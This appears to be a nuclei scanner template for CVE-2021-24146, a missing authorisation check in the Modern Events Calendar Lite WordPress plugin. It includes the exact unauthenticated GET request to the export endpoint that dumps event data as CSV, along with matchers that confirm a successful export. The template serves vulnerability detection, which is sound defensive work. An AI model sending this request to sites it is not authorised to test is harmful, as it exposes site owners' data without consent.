nuclei-templates/cves/2021/CVE-2021-24146.yaml

35 lines
1.0 KiB
YAML
Raw Normal View History

2021-04-23 03:17:52 +00:00
id: CVE-2021-24146
info:
name: Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export
author: random_robbie
2021-04-23 03:17:52 +00:00
severity: high
description: Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports
all events data in CSV or XML format for example.
reference:
- https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score: 7.5
cve-id: CVE-2021-24146
cwe-id: CWE-284
tags: wordpress,wp-plugin,cve,cve2021
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"
matchers-condition: and
matchers:
- type: word
words:
- "mec-events"
2021-06-17 01:16:54 +00:00
- "text/csv"
condition: and
part: header
2021-04-23 03:08:45 +00:00
- type: status
status:
- 200